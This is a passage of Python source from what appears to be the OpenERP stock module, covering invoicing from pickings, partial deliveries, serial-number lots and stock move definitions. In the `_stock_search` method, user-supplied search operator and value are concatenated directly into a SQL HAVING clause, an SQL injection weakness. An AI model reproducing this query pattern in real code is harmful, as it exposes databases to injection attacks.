    def _get_comment_invoice(self, cr, uid, picking):
        """
        @return: comment string for invoice
        """
        return picking.note or ''

    def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):
        """ Gets price unit for invoice
        @param move_line: Stock move lines
        @param type: Type of invoice
        @return: The price unit for the move line
        """
        if context is None:
            context = {}

        if type in ('in_invoice', 'in_refund'):
            # Take the user company and pricetype
            context['currency_id'] = move_line.company_id.currency_id.id
            amount_unit = move_line.product_id.price_get('standard_price', context=context)[move_line.product_id.id]
            return amount_unit
        else:
            return move_line.product_id.list_price

    def _get_discount_invoice(self, cr, uid, move_line):
        '''Return the discount for the move line'''
        return 0.0

    def _get_taxes_invoice(self, cr, uid, move_line, type):
        """ Gets taxes on invoice
        @param move_line: Stock move lines
        @param type: Type of invoice
        @return: Taxes Ids for the move line
        """
        if type in ('in_invoice', 'in_refund'):
            taxes = move_line.product_id.supplier_taxes_id
        else:
            taxes = move_line.product_id.taxes_id

        if move_line.picking_id and move_line.picking_id.partner_id and move_line.picking_id.partner_id.id:
            return self.pool.get('account.fiscal.position').map_tax(
                cr,
                uid,
                move_line.picking_id.partner_id.property_account_position,
                taxes
            )
        else:
            return map(lambda x: x.id, taxes)

    def _get_account_analytic_invoice(self, cr, uid, picking, move_line):
        return False

    def _invoice_line_hook(self, cr, uid, move_line, invoice_line_id):
        '''Call after the creation of the invoice line'''
        return

    def _invoice_hook(self, cr, uid, picking, invoice_id):
        '''Call after the creation of the invoice'''
        return

    def _get_invoice_type(self, pick):
        src_usage = dest_usage = None
        inv_type = None
        if pick.invoice_state == '2binvoiced':
            if pick.move_lines:
                src_usage = pick.move_lines[0].location_id.usage
                dest_usage = pick.move_lines[0].location_dest_id.usage
            if pick.type == 'out' and dest_usage == 'supplier':
                inv_type = 'in_refund'
            elif pick.type == 'out' and dest_usage == 'customer':
                inv_type = 'out_invoice'
            elif pick.type == 'in' and src_usage == 'supplier':
                inv_type = 'in_invoice'
            elif pick.type == 'in' and src_usage == 'customer':
                inv_type = 'out_refund'
            else:
                inv_type = 'out_invoice'
        return inv_type

    def _prepare_invoice_group(self, cr, uid, picking, partner, invoice, context=None):
        """ Builds the dict for grouped invoices
            @param picking: picking object
            @param partner: object of the partner to invoice (not used here, but may be usefull if this function is inherited)
            @param invoice: object of the invoice that we are updating
            @return: dict that will be used to update the invoice
        """
        comment = self._get_comment_invoice(cr, uid, picking)
        return {
            'name': (invoice.name or '') + ', ' + (picking.name or ''),
            'origin': (invoice.origin or '') + ', ' + (picking.name or '') + (picking.origin and (':' + picking.origin) or ''),
            'comment': (comment and (invoice.comment and invoice.comment + "\n" + comment or comment)) or (invoice.comment and invoice.comment or ''),
            'date_invoice': context.get('date_inv', False),
            'user_id': uid,
        }

    def _prepare_invoice(self, cr, uid, picking, partner, inv_type, journal_id, context=None):
        """ Builds the dict containing the values for the invoice
            @param picking: picking object
            @param partner: object of the partner to invoice
            @param inv_type: type of the invoice ('out_invoice', 'in_invoice', ...)
            @param journal_id: ID of the accounting journal
            @return: dict that will be used to create the invoice object
        """
        if isinstance(partner, int):
            partner = self.pool.get('res.partner').browse(cr, uid, partner, context=context)
        if inv_type in ('out_invoice', 'out_refund'):
            account_id = partner.property_account_receivable.id
            payment_term = partner.property_payment_term.id or False
        else:
            account_id = partner.property_account_payable.id
            payment_term = partner.property_supplier_payment_term.id or False
        comment = self._get_comment_invoice(cr, uid, picking)
        invoice_vals = {
            'name': picking.name,
            'origin': (picking.name or '') + (picking.origin and (':' + picking.origin) or ''),
            'type': inv_type,
            'account_id': account_id,
            'partner_id': partner.id,
            'comment': comment,
            'payment_term': payment_term,
            'fiscal_position': partner.property_account_position.id,
            'date_invoice': context.get('date_inv', False),
            'company_id': picking.company_id.id,
            'user_id': uid,
        }
        cur_id = self.get_currency_id(cr, uid, picking)
        if cur_id:
            invoice_vals['currency_id'] = cur_id
        if journal_id:
            invoice_vals['journal_id'] = journal_id
        return invoice_vals

    def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id,
        invoice_vals, context=None):
        """ Builds the dict containing the values for the invoice line
            @param group: True or False
            @param picking: picking object
            @param: move_line: move_line object
            @param: invoice_id: ID of the related invoice
            @param: invoice_vals: dict used to created the invoice
            @return: dict that will be used to create the invoice line
        """
        if group:
            name = (picking.name or '') + '-' + move_line.name
        else:
            name = move_line.name
        origin = move_line.picking_id.name or ''
        if move_line.picking_id.origin:
            origin += ':' + move_line.picking_id.origin

        if invoice_vals['type'] in ('out_invoice', 'out_refund'):
            account_id = move_line.product_id.property_account_income.id
            if not account_id:
                account_id = move_line.product_id.categ_id.\
                        property_account_income_categ.id
        else:
            account_id = move_line.product_id.property_account_expense.id
            if not account_id:
                account_id = move_line.product_id.categ_id.\
                        property_account_expense_categ.id
        if invoice_vals['fiscal_position']:
            fp_obj = self.pool.get('account.fiscal.position')
            fiscal_position = fp_obj.browse(cr, uid, invoice_vals['fiscal_position'], context=context)
            account_id = fp_obj.map_account(cr, uid, fiscal_position, account_id)
        # set UoS if it's a sale and the picking doesn't have one
        uos_id = move_line.product_uos and move_line.product_uos.id or False
        if not uos_id and invoice_vals['type'] in ('out_invoice', 'out_refund'):
            uos_id = move_line.product_uom.id

        return {
            'name': name,
            'origin': origin,
            'invoice_id': invoice_id,
            'uos_id': uos_id,
            'product_id': move_line.product_id.id,
            'account_id': account_id,
            'price_unit': self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type']),
            'discount': self._get_discount_invoice(cr, uid, move_line),
            'quantity': move_line.product_uos_qty or move_line.product_qty,
            'invoice_line_tax_id': [(6, 0, self._get_taxes_invoice(cr, uid, move_line, invoice_vals['type']))],
            'account_analytic_id': self._get_account_analytic_invoice(cr, uid, picking, move_line),
        }

    def action_invoice_create(self, cr, uid, ids, journal_id=False,
            group=False, type='out_invoice', context=None):
        """ Creates invoice based on the invoice state selected for picking.
        @param journal_id: Id of journal
        @param group: Whether to create a group invoice or not
        @param type: Type invoice to be created
        @return: Ids of created invoices for the pickings
        """
        if context is None:
            context = {}

        invoice_obj = self.pool.get('account.invoice')
        invoice_line_obj = self.pool.get('account.invoice.line')
        partner_obj = self.pool.get('res.partner')
        invoices_group = {}
        res = {}
        inv_type = type
        for picking in self.browse(cr, uid, ids, context=context):
            if picking.invoice_state != '2binvoiced':
                continue
            partner = self._get_partner_to_invoice(cr, uid, picking, context=context)
            if isinstance(partner, int):
                partner = partner_obj.browse(cr, uid, [partner], context=context)[0]
            if not partner:
                raise osv.except_osv(_('Error, no partner!'),
                    _('Please put a partner on the picking list if you want to generate invoice.'))

            if not inv_type:
                inv_type = self._get_invoice_type(picking)

            if group and partner.id in invoices_group:
                invoice_id = invoices_group[partner.id]
                invoice = invoice_obj.browse(cr, uid, invoice_id)
                invoice_vals_group = self._prepare_invoice_group(cr, uid, picking, partner, invoice, context=context)
                invoice_obj.write(cr, uid, [invoice_id], invoice_vals_group, context=context)
            else:
                invoice_vals = self._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)
                invoice_id = invoice_obj.create(cr, uid, invoice_vals, context=context)
                invoices_group[partner.id] = invoice_id
            res[picking.id] = invoice_id
            for move_line in picking.move_lines:
                if move_line.state == 'cancel':
                    continue
                if move_line.scrapped:
                    # do no invoice scrapped products
                    continue
                vals = self._prepare_invoice_line(cr, uid, group, picking, move_line,
                                invoice_id, invoice_vals, context=context)
                if vals:
                    invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)
                    self._invoice_line_hook(cr, uid, move_line, invoice_line_id)

            invoice_obj.button_compute(cr, uid, [invoice_id], context=context,
                    set_total=(inv_type in ('in_invoice', 'in_refund')))
            self.write(cr, uid, [picking.id], {
                'invoice_state': 'invoiced',
                }, context=context)
            self._invoice_hook(cr, uid, picking, invoice_id)
        self.write(cr, uid, res.keys(), {
            'invoice_state': 'invoiced',
            }, context=context)
        return res

    def test_done(self, cr, uid, ids, context=None):
        """ Test whether the move lines are done or not.
        @return: True or False
        """
        ok = False
        for pick in self.browse(cr, uid, ids, context=context):
            if not pick.move_lines:
                return True
            for move in pick.move_lines:
                if move.state not in ('cancel','done'):
                    return False
                if move.state=='done':
                    ok = True
        return ok

    def test_cancel(self, cr, uid, ids, context=None):
        """ Test whether the move lines are canceled or not.
        @return: True or False
        """
        for pick in self.browse(cr, uid, ids, context=context):
            for move in pick.move_lines:
                if move.state not in ('cancel',):
                    return False
        return True

    def allow_cancel(self, cr, uid, ids, context=None):
        for pick in self.browse(cr, uid, ids, context=context):
            if not pick.move_lines:
                return True
            for move in pick.move_lines:
                if move.state == 'done':
                    raise osv.except_osv(_('Error!'), _('You cannot cancel the picking as some moves have been done. You should cancel the picking lines.'))
        return True

    def unlink(self, cr, uid, ids, context=None):
        move_obj = self.pool.get('stock.move')
        if context is None:
            context = {}
        for pick in self.browse(cr, uid, ids, context=context):
            if pick.state in ['done','cancel']:
                raise osv.except_osv(_('Error!'), _('You cannot remove the picking which is in %s state!')%(pick.state,))
            else:
                ids2 = [move.id for move in pick.move_lines]
                ctx = context.copy()
                ctx.update({'call_unlink':True})
                if pick.state != 'draft':
                    #Cancelling the move in order to affect Virtual stock of product
                    move_obj.action_cancel(cr, uid, ids2, ctx)
                #Removing the move
                move_obj.unlink(cr, uid, ids2, ctx)

        return super(stock_picking, self).unlink(cr, uid, ids, context=context)

    # FIXME: needs refactoring, this code is partially duplicated in stock_move.do_partial()!
    def do_partial(self, cr, uid, ids, partial_datas, context=None):
        """ Makes partial picking and moves done.
        @param partial_datas : Dictionary containing details of partial picking
                          like partner_id, partner_id, delivery_date,
                          delivery moves with product_id, product_qty, uom
        @return: Dictionary of values
        """
        if context is None:
            context = {}
        else:
            context = dict(context)
        res = {}
        move_obj = self.pool.get('stock.move')
        product_obj = self.pool.get('product.product')
        currency_obj = self.pool.get('res.currency')
        uom_obj = self.pool.get('product.uom')
        sequence_obj = self.pool.get('ir.sequence')
        wf_service = netsvc.LocalService("workflow")
        for pick in self.browse(cr, uid, ids, context=context):
            new_picking = None
            complete, too_many, too_few = [], [], []
            move_product_qty, prodlot_ids, product_avail, partial_qty, product_uoms = {}, {}, {}, {}, {}
            for move in pick.move_lines:
                if move.state in ('done', 'cancel'):
                    continue
                partial_data = partial_datas.get('move%s'%(move.id), {})
                product_qty = partial_data.get('product_qty',0.0)
                move_product_qty[move.id] = product_qty
                product_uom = partial_data.get('product_uom',False)
                product_price = partial_data.get('product_price',0.0)
                product_currency = partial_data.get('product_currency',False)
                prodlot_id = partial_data.get('prodlot_id')
                prodlot_ids[move.id] = prodlot_id
                product_uoms[move.id] = product_uom
                partial_qty[move.id] = uom_obj._compute_qty(cr, uid, product_uoms[move.id], product_qty, move.product_uom.id)
                if move.product_qty == partial_qty[move.id]:
                    complete.append(move)
                elif move.product_qty > partial_qty[move.id]:
                    too_few.append(move)
                else:
                    too_many.append(move)

                # Average price computation
                if (pick.type == 'in') and (move.product_id.cost_method == 'average'):
                    product = product_obj.browse(cr, uid, move.product_id.id)
                    move_currency_id = move.company_id.currency_id.id
                    context['currency_id'] = move_currency_id
                    qty = uom_obj._compute_qty(cr, uid, product_uom, product_qty, product.uom_id.id)

                    if product.id not in product_avail:
                        # keep track of stock on hand including processed lines not yet marked as done
                        product_avail[product.id] = product.qty_available

                    if qty > 0:
                        new_price = currency_obj.compute(cr, uid, product_currency,
                                move_currency_id, product_price, round=False)
                        new_price = uom_obj._compute_price(cr, uid, product_uom, new_price,
                                product.uom_id.id)
                        if product_avail[product.id] <= 0:
                            product_avail[product.id] = 0
                            new_std_price = new_price
                        else:
                            # Get the standard price
                            amount_unit = product.price_get('standard_price', context=context)[product.id]
                            new_std_price = ((amount_unit * product_avail[product.id])\
                                + (new_price * qty))/(product_avail[product.id] + qty)
                        # Write the field according to price type field
                        product_obj.write(cr, uid, [product.id], {'standard_price': new_std_price})

                        # Record the values that were chosen in the wizard, so they can be
                        # used for inventory valuation if real-time valuation is enabled.
                        move_obj.write(cr, uid, [move.id],
                                {'price_unit': product_price,
                                 'price_currency_id': product_currency})

                        product_avail[product.id] += qty



            for move in too_few:
                product_qty = move_product_qty[move.id]
                if not new_picking:
                    new_picking_name = pick.name
                    self.write(cr, uid, [pick.id], 
                               {'name': sequence_obj.get(cr, uid,
                                            'stock.picking.%s'%(pick.type)),
                               })
                    new_picking = self.copy(cr, uid, pick.id,
                            {
                                'name': new_picking_name,
                                'move_lines' : [],
                                'state':'draft',
                            })
                if product_qty != 0:
                    defaults = {
                            'product_qty' : product_qty,
                            'product_uos_qty': product_qty, #TODO: put correct uos_qty
                            'picking_id' : new_picking,
                            'state': 'assigned',
                            'move_dest_id': False,
                            'price_unit': move.price_unit,
                            'product_uom': product_uoms[move.id]
                    }
                    prodlot_id = prodlot_ids[move.id]
                    if prodlot_id:
                        defaults.update(prodlot_id=prodlot_id)
                    move_obj.copy(cr, uid, move.id, defaults)
                move_obj.write(cr, uid, [move.id],
                        {
                            'product_qty': move.product_qty - partial_qty[move.id],
                            'product_uos_qty': move.product_qty - partial_qty[move.id], #TODO: put correct uos_qty
                            'prodlot_id': False,
                            'tracking_id': False,
                        })

            if new_picking:
                move_obj.write(cr, uid, [c.id for c in complete], {'picking_id': new_picking})
            for move in complete:
                defaults = {'product_uom': product_uoms[move.id], 'product_qty': move_product_qty[move.id]}
                if prodlot_ids.get(move.id):
                    defaults.update({'prodlot_id': prodlot_ids[move.id]})
                move_obj.write(cr, uid, [move.id], defaults)
            for move in too_many:
                product_qty = move_product_qty[move.id]
                defaults = {
                    'product_qty' : product_qty,
                    'product_uos_qty': product_qty, #TODO: put correct uos_qty
                    'product_uom': product_uoms[move.id]
                }
                prodlot_id = prodlot_ids.get(move.id)
                if prodlot_ids.get(move.id):
                    defaults.update(prodlot_id=prodlot_id)
                if new_picking:
                    defaults.update(picking_id=new_picking)
                move_obj.write(cr, uid, [move.id], defaults)

            # At first we confirm the new picking (if necessary)
            if new_picking:
                wf_service.trg_validate(uid, 'stock.picking', new_picking, 'button_confirm', cr)
                # Then we finish the good picking
                self.write(cr, uid, [pick.id], {'backorder_id': new_picking})
                self.action_move(cr, uid, [new_picking], context=context)
                wf_service.trg_validate(uid, 'stock.picking', new_picking, 'button_done', cr)
                wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
                delivered_pack_id = pick.id
                back_order_name = self.browse(cr, uid, delivered_pack_id, context=context).name
                self.message_post(cr, uid, new_picking, body=_("Back order <em>%s</em> has been <b>created</b>.") % (back_order_name), context=context)
            else:
                self.action_move(cr, uid, [pick.id], context=context)
                wf_service.trg_validate(uid, 'stock.picking', pick.id, 'button_done', cr)
                delivered_pack_id = pick.id

            delivered_pack = self.browse(cr, uid, delivered_pack_id, context=context)
            res[pick.id] = {'delivered_picking': delivered_pack.id or False}

        return res
    
    # views associated to each picking type
    _VIEW_LIST = {
        'out': 'view_picking_out_form',
        'in': 'view_picking_in_form',
        'internal': 'view_picking_form',
    }
    def _get_view_id(self, cr, uid, type):
        """Get the view id suiting the given type
        
        @param type: the picking type as a string
        @return: view i, or False if no view found
        """
        res = self.pool.get('ir.model.data').get_object_reference(cr, uid, 
            'stock', self._VIEW_LIST.get(type, 'view_picking_form'))            
        return res and res[1] or False


class stock_production_lot(osv.osv):

    def name_get(self, cr, uid, ids, context=None):
        if not ids:
            return []
        reads = self.read(cr, uid, ids, ['name', 'prefix', 'ref'], context)
        res = []
        for record in reads:
            name = record['name']
            prefix = record['prefix']
            if prefix:
                name = prefix + '/' + name
            if record['ref']:
                name = '%s [%s]' % (name, record['ref'])
            res.append((record['id'], name))
        return res

    def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
        args = args or []
        ids = []
        if name:
            ids = self.search(cr, uid, [('prefix', '=', name)] + args, limit=limit, context=context)
            if not ids:
                ids = self.search(cr, uid, [('name', operator, name)] + args, limit=limit, context=context)
        else:
            ids = self.search(cr, uid, args, limit=limit, context=context)
        return self.name_get(cr, uid, ids, context)

    _name = 'stock.production.lot'
    _description = 'Serial Number'

    def _get_stock(self, cr, uid, ids, field_name, arg, context=None):
        """ Gets stock of products for locations
        @return: Dictionary of values
        """
        if context is None:
            context = {}
        if 'location_id' not in context:
            locations = self.pool.get('stock.location').search(cr, uid, [('usage', '=', 'internal')], context=context)
        else:
            locations = context['location_id'] and [context['location_id']] or []

        if isinstance(ids, (int, long)):
            ids = [ids]

        res = {}.fromkeys(ids, 0.0)
        if locations:
            cr.execute('''select
                    prodlot_id,
                    sum(qty)
                from
                    stock_report_prodlots
                where
                    location_id IN %s and prodlot_id IN %s group by prodlot_id''',(tuple(locations),tuple(ids),))
            res.update(dict(cr.fetchall()))

        return res

    def _stock_search(self, cr, uid, obj, name, args, context=None):
        """ Searches Ids of products
        @return: Ids of locations
        """
        locations = self.pool.get('stock.location').search(cr, uid, [('usage', '=', 'internal')])
        cr.execute('''select
                prodlot_id,
                sum(qty)
            from
                stock_report_prodlots
            where
                location_id IN %s group by prodlot_id
            having  sum(qty) '''+ str(args[0][1]) + str(args[0][2]),(tuple(locations),))
        res = cr.fetchall()
        ids = [('id', 'in', map(lambda x: x[0], res))]
        return ids

    _columns = {
        'name': fields.char('Serial Number', size=64, required=True, help="Unique Serial Number, will be displayed as: PREFIX/SERIAL [INT_REF]"),
        'ref': fields.char('Internal Reference', size=256, help="Internal reference number in case it differs from the manufacturer's serial number"),
        'prefix': fields.char('Prefix', size=64, help="Optional prefix to prepend when displaying this serial number: PREFIX/SERIAL [INT_REF]"),
        'product_id': fields.many2one('product.product', 'Product', required=True, domain=[('type', '<>', 'service')]),
        'date': fields.datetime('Creation Date', required=True),
        'stock_available': fields.function(_get_stock, fnct_search=_stock_search, type="float", string="Available", select=True,
            help="Current quantity of products with this Serial Number available in company warehouses",
            digits_compute=dp.get_precision('Product Unit of Measure')),
        'revisions': fields.one2many('stock.production.lot.revision', 'lot_id', 'Revisions'),
        'company_id': fields.many2one('res.company', 'Company', select=True),
        'move_ids': fields.one2many('stock.move', 'prodlot_id', 'Moves for this serial number', readonly=True),
    }
    _defaults = {
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
        'name': lambda x, y, z, c: x.pool.get('ir.sequence').get(y, z, 'stock.lot.serial'),
        'product_id': lambda x, y, z, c: c.get('product_id', False),
    }
    _sql_constraints = [
        ('name_ref_uniq', 'unique (name, ref)', 'The combination of Serial Number and internal reference must be unique !'),
    ]
    def action_traceability(self, cr, uid, ids, context=None):
        """ It traces the information of a product
        @param self: The object pointer.
        @param cr: A database cursor
        @param uid: ID of the user currently logged in
        @param ids: List of IDs selected
        @param context: A standard dictionary
        @return: A dictionary of values
        """
        value=self.pool.get('action.traceability').action_traceability(cr,uid,ids,context)
        return value

    def copy(self, cr, uid, id, default=None, context=None):
        context = context or {}
        default = default and default.copy() or {}
        default.update(date=time.strftime('%Y-%m-%d %H:%M:%S'), move_ids=[])
        return super(stock_production_lot, self).copy(cr, uid, id, default=default, context=context)

stock_production_lot()

class stock_production_lot_revision(osv.osv):
    _name = 'stock.production.lot.revision'
    _description = 'Serial Number Revision'

    _columns = {
        'name': fields.char('Revision Name', size=64, required=True),
        'description': fields.text('Description'),
        'date': fields.date('Revision Date'),
        'indice': fields.char('Revision Number', size=16),
        'author_id': fields.many2one('res.users', 'Author'),
        'lot_id': fields.many2one('stock.production.lot', 'Serial Number', select=True, ondelete='cascade'),
        'company_id': fields.related('lot_id','company_id',type='many2one',relation='res.company',string='Company', store=True, readonly=True),
    }

    _defaults = {
        'author_id': lambda x, y, z, c: z,
        'date': fields.date.context_today,
    }

stock_production_lot_revision()

# ----------------------------------------------------
# Move
# ----------------------------------------------------

#
# Fields:
#   location_dest_id is only used for predicting futur stocks
#
class stock_move(osv.osv):

    def _getSSCC(self, cr, uid, context=None):
        cr.execute('select id from stock_tracking where create_uid=%s order by id desc limit 1', (uid,))
        res = cr.fetchone()
        return (res and res[0]) or False

    _name = "stock.move"
    _description = "Stock Move"
    _order = 'date_expected desc, id'
    _log_create = False

    def action_partial_move(self, cr, uid, ids, context=None):
        if context is None: context = {}
        if context.get('active_model') != self._name:
            context.update(active_ids=ids, active_model=self._name)
        partial_id = self.pool.get("stock.partial.move").create(
            cr, uid, {}, context=context)
        return {
            'name':_("Products to Process"),
            'view_mode': 'form',
            'view_id': False,
            'view_type': 'form',
            'res_model': 'stock.partial.move',
            'res_id': partial_id,
            'type': 'ir.actions.act_window',
            'nodestroy': True,
            'target': 'new',
            'domain': '[]',
            'context': context
        }


    def name_get(self, cr, uid, ids, context=None):
        res = []
        for line in self.browse(cr, uid, ids, context=context):
            name = line.location_id.name+' > '+line.location_dest_id.name
            # optional prefixes
            if line.product_id.code:
                name = line.product_id.code + ': ' + name
            if line.picking_id.origin:
                name = line.picking_id.origin + '/ ' + name
            res.append((line.id, name))
        return res

    def _check_tracking(self, cr, uid, ids, context=None):
        """ Checks if serial number is assigned to stock move or not.
        @return: True or False
        """
        for move in self.browse(cr, uid, ids, context=context):
            if not move.prodlot_id and \
               (move.state == 'done' and \
               ( \
                   (move.product_id.track_production and move.location_id.usage == 'production') or \
                   (move.product_id.track_production and move.location_dest_id.usage == 'production') or \
                   (move.product_id.track_incoming and move.location_id.usage == 'supplier') or \
                   (move.product_id.track_outgoing and move.location_dest_id.usage == 'customer') or \
                   (move.product_id.track_incoming and move.location_id.usage == 'inventory') \
               )):
                return False
        return True

    def _check_product_lot(self, cr, uid, ids, context=None):
        """ Checks whether move is done or not and production lot is assigned to that move.
        @return: True or False
        """
        for move in self.browse(cr, uid, ids, context=context):
            if move.prodlot_id and move.state == 'done' and (move.prodlot_id.product_id.id != move.product_id.id):
                return False
        return True

    _columns = {
        'name': fields.char('Description', required=True, select=True),
        'priority': fields.selection([('0', 'Not urgent'), ('1', 'Urgent')], 'Priority'),
        'create_date': fields.datetime('Creation Date', readonly=True, select=True),
        'date': fields.datetime('Date', required=True, select=True, help="Move date: scheduled date until move is done, then date of actual move processing", states={'done': [('readonly', True)]}),
        'date_expected': fields.datetime('Scheduled Date', states={'done': [('readonly', True)]},required=True, select=True, help="Scheduled date for the processing of this move"),
        'product_id': fields.many2one('product.product', 'Product', required=True, select=True, domain=[('type','<>','service')],states={'done': [('readonly', True)]}),

        'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'),
            required=True,states={'done': [('readonly', True)]},
            help="This is the quantity of products from an inventory "
                "point of view. For moves in the state 'done', this is the "
                "quantity of products that were actually moved. For other "
                "moves, this is the quantity of product that is planned to "
                "be moved. Lowering this quantity does not generate a "
                "backorder. Changing this quantity on assigned moves affects "
                "the product reservation, and should be done with care."
        ),
        'product_uom': fields.many2one('product.uom', 'Unit of Measure', required=True,states={'done': [('readonly', True)]}),
        'product_uos_qty': fields.float('Quantity (UOS)', digits_compute=dp.get_precision('Product Unit of Measure'), states={'done': [('readonly', True)]}),
        'product_uos': fields.many2one('product.uom', 'Product UOS', states={'done': [('readonly', True)]}),
        'product_packaging': fields.many2one('product.packaging', 'Packaging', help="It specifies attributes of packaging like type, quantity of packaging,etc."),

        'location_id': fields.many2one('stock.location', 'Source Location', required=True, select=True,states={'done': [('readonly', True)]}, help="Sets a location if you produce at a fixed location. This can be a partner location if you subcontract the manufacturing operations."),
        'location_dest_id': fields.many2one('stock.location', 'Destination Location', required=True,states={'done': [('readonly', True)]}, select=True, help="Location where the system will stock the finished products."),
        'partner_id': fields.many2one('res.partner', 'Destination Address ', states={'done': [('readonly', True)]}, help="Optional address where goods are to be delivered, specifically used for allotment"),

        'prodlot_id': fields.many2one('stock.production.lot', 'Serial Number', states={'done': [('readonly', True)]}, help="Serial number is used to put a serial number on the production", select=True),
        'tracking_id': fields.many2one('stock.tracking', 'Pack', select=True, states={'done': [('readonly', True)]}, help="Logistical shipping unit: pallet, box, pack ..."),

        'auto_validate': fields.boolean('Auto Validate'),

        'move_dest_id': fields.many2one('stock.move', 'Destination Move', help="Optional: next stock move when chaining them", select=True),
        'move_history_ids': fields.many2many('stock.move', 'stock_move_history_ids', 'parent_id', 'child_id', 'Move History (child moves)'),
        'move_history_ids2': fields.many2many('stock.move', 'stock_move_history_ids', 'child_id', 'parent_id', 'Move History (parent moves)'),
        'picking_id': fields.many2one('stock.picking', 'Reference', select=True,states={'done': [('readonly', True)]}),
        'note': fields.text('Notes'),
        'state': fields.selection([('draft', 'New'),
                                   ('cancel', 'Cancelled'),
                                   ('waiting', 'Waiting Another Move'),
                                   ('confirmed', 'Waiting Availability'),
                                   ('assigned', 'Available'),
                                   ('done', 'Done'),
                                   ], 'Status', readonly=True, select=True,
                 help= "* New: When the stock move is created and not yet confirmed.\n"\
                       "* Waiting Another Move: This state can be seen when a move is waiting for another one, for example in a chained flow.\n"\
                       "* Waiting Availability: This state is reached when the procurement resolution is not straight forward. It may need the scheduler to run, a component to me manufactured...\n"\
                       "* Available: When products are reserved, it is set to \'Available\'.\n"\
                       "* Done: When the shipment is processed, the state is \'Done\'."),
        'price_unit': fields.float('Unit Price', digits_compute= dp.get_precision('Product Price'), help="Technical field used to record the product cost set by the user during a picking confirmation (when average price costing method is used)"),
        'price_currency_id': fields.many2one('res.currency', 'Currency for average price', help="Technical field used to record the currency chosen by the user during a picking confirmation (when average price costing method is used)"),
        'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
        'backorder_id': fields.related('picking_id','backorder_id',type='many2one', relation="stock.picking", string="Back Order of", select=True),
        'origin': fields.related('picking_id','origin',type='char', size=64, relation="stock.picking", string="Source", store=True),

        # used for colors in tree views:
        'scrapped': fields.related('location_dest_id','scrap_location',type='boolean',relation='stock.location',string='Scrapped', readonly=True),
        'type': fields.related('picking_id', 'type', type='selection', selection=[('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], string='Shipping Type'),
    }

    def _check_location(self, cr, uid, ids, context=None):
        for record in self.browse(cr, uid, ids, context=context):
            if (record.state=='done') and (record.location_id.usage == 'view'):
                raise osv.except_osv(_('Error'), _('You cannot move product %s from a location of type view %s.')% (record.product_id.name, record.location_id.name))
            if (record.state=='done') and (record.location_dest_id.usage == 'view' ):
                raise osv.except_osv(_('Error'), _('You cannot move product %s to a location of type view %s.')% (record.product_id.name, record.location_dest_id.name))
        return True

    _constraints = [
        (_check_tracking,
            'You must assign a serial number for this product.',
            ['prodlot_id']),
        (_check_location, 'You cannot move products from or to a location of the type view.',
            ['location_id','location_dest_id']),
        (_check_product_lot,
            'You try to assign a lot which is not from the same product.',
            ['prodlot_id'])]

    def _default_location_destination(self, cr, uid, context=None):
        """ Gets default address of partner for destination location
        @return: Address id or False
        """
        mod_obj = self.pool.get('ir.model.data')
        picking_type = context.get('picking_type')
        location_id = False
        if context is None:
            context = {}
        if context.get('move_line', []):
            if context['move_line'][0]:
                if isinstance(context['move_line'][0], (tuple, list)):
                    location_id = context['move_line'][0][2] and context['move_line'][0][2].get('location_dest_id',False)
                else:
                    move_list = self.pool.get('stock.move').read(cr, uid, context['move_line'][0], ['location_dest_id'])
                    location_id = move_list and move_list['location_dest_id'][0] or False
        elif context.get('address_out_id', False):
            property_out = self.pool.get('res.partner').browse(cr, uid, context['address_out_id'], context).property_stock_customer
            location_id = property_out and property_out.id or False
        else:
            location_xml_id = False
            if picking_type in ('in', 'internal'):
                location_xml_id = 'stock_location_stock'
            elif picking_type == 'out':
                location_xml_id = 'stock_location_customers'
            if location_xml_id:
                try:
                    location_model, location_id = mod_obj.get_object_reference(cr, uid, 'stock', location_xml_id)
                    with tools.mute_logger('openerp.osv.orm'):
                        self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
                except (orm.except_orm, ValueError):
                    location_id = False

        return location_id

    def _default_location_source(self, cr, uid, context=None):
        """ Gets default address of partner for source location
        @return: Address id or False
        """
        mod_obj = self.pool.get('ir.model.data')
        picking_type = context.get('picking_type')
        location_id = False

        if context is None:
            context = {}
        if context.get('move_line', []):
            try:
                location_id = context['move_line'][0][2]['location_id']
            except:
                pass
        elif context.get('address_in_id', False):
            part_obj_add = self.pool.get('res.partner').browse(cr, uid, context['address_in_id'], context=context)
            if part_obj_add:
                location_id = part_obj_add.property_stock_supplier.id
        else:
            location_xml_id = False
            if picking_type == 'in':
                location_xml_id = 'stock_location_suppliers'
            elif picking_type in ('out', 'internal'):
                location_xml_id = 'stock_location_stock'
            if location_xml_id:
                try:
                    location_model, location_id = mod_obj.get_object_reference(cr, uid, 'stock', location_xml_id)
                    with tools.mute_logger('openerp.osv.orm'):
                        self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
                except (orm.except_orm, ValueError):
                    location_id = False

        return location_id

    def _default_destination_address(self, cr, uid, context=None):
        user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
        return user.company_id.partner_id.id

    def _default_move_type(self, cr, uid, context=None):
        """ Gets default type of move
        @return: type
        """
        if context is None:
            context = {}
        picking_type = context.get('picking_type')
        type = 'internal'
        if picking_type == 'in':
            type = 'in'
        elif picking_type == 'out':
            type = 'out'
        return type

    _defaults = {
        'location_id': _default_location_source,
        'location_dest_id': _default_location_destination,
        'partner_id': _default_destination_address,
        'type': _default_move_type,
        'state': 'draft',
        'priority': '1',
        'product_qty': 1.0,
        'scrapped' :  False,
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
        'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.move', context=c),
        'date_expected': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
    }

    def write(self, cr, uid, ids, vals, context=None):
        if isinstance(ids, (int, long)):
            ids = [ids]
        if uid != 1:
